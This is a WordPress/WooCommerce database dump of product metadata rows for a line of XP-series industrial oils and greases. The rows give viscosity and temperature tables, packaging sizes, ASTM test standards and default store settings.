INSERT INTO `wp_postmeta` VALUES (10638, 997, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10639, 997, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10640, 997, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10641, 997, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10642, 997, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10643, 997, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10644, 997, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10645, 997, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10646, 997, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10647, 997, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10648, 997, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10649, 997, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10650, 997, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10651, 997, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10652, 997, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10653, 997, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10654, 997, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10655, 997, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10656, 997, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10657, 997, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10658, 997, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10659, 997, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10660, 997, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10661, 997, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10662, 997, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10663, 997, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10664, 997, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10665, 997, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10666, 997, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10667, 997, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10696, 997, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10697, 997, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10698, 998, '_edit_lock', '1474297865:2'); 
INSERT INTO `wp_postmeta` VALUES (10699, 998, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10700, 998, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10701, 998, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10702, 998, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10703, 998, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10704, 998, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10705, 998, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10706, 998, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10707, 998, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10708, 998, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10709, 998, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10710, 998, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10711, 998, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10712, 998, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10713, 998, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10714, 998, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10715, 998, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10716, 998, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10717, 998, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10718, 998, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10719, 998, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10720, 998, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10721, 998, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10722, 998, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10723, 998, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10724, 998, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10725, 998, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10726, 998, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10727, 998, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10728, 998, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10729, 998, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10730, 998, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10731, 998, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10732, 998, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10761, 998, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10762, 998, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10763, 999, '_edit_lock', '1474297904:2'); 
INSERT INTO `wp_postmeta` VALUES (10764, 999, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10765, 999, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10766, 999, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10767, 999, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10768, 999, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10769, 999, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10770, 999, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10771, 999, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10772, 999, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10773, 999, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10774, 999, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10775, 999, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10776, 999, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10777, 999, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10778, 999, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10779, 999, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10780, 999, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10781, 999, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10782, 999, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10783, 999, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10784, 999, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10785, 999, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10786, 999, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10787, 999, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10788, 999, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10789, 999, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10790, 999, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10791, 999, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10792, 999, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10793, 999, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10794, 999, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10795, 999, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10796, 999, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10797, 999, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10826, 1000, '_wp_attached_file', '2016/08/58034.pdf'); 
INSERT INTO `wp_postmeta` VALUES (10827, 999, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10828, 999, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10829, 1001, '_edit_lock', '1474297945:2'); 
INSERT INTO `wp_postmeta` VALUES (10830, 1001, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10831, 1001, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10832, 1001, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10833, 1001, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10834, 1001, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
